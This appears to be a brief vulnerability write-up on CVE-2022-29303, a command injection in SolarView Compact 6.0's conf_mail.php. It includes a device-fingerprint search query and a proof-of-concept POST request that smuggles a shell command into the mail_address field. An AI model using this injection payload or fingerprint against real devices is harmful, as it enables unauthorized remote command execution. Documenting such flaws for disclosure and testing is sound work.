Solarview Compact Conf_mail Php Remote Command Execution Vulnerability Cve 2022 29303
Solarview Compact Conf_mail Php Remote Command Execution Vulnerability Cve 2022 29303
SolarView Compact conf_mail.php Remote command execution vulnerability CVE-2022-29303
Vulnerability Description
SolarView Compact conf_mail.php has a remote command execution vulnerability. The attacker can obtain server permissions by constructing special requests.
Vulnerability Impact
SolarView Compact 6.0
Network surveying and mapping
body=”SolarView Compact” && title==”Top”
Vulnerability reappears
Main page
Verify POC
1
2
3
POST /conf_mail.php
mail_address=%3Bid%3B&button=%83%81%81%5B%83%8B%91%97%90M
This post is licensed under CC BY 4.0 by the author.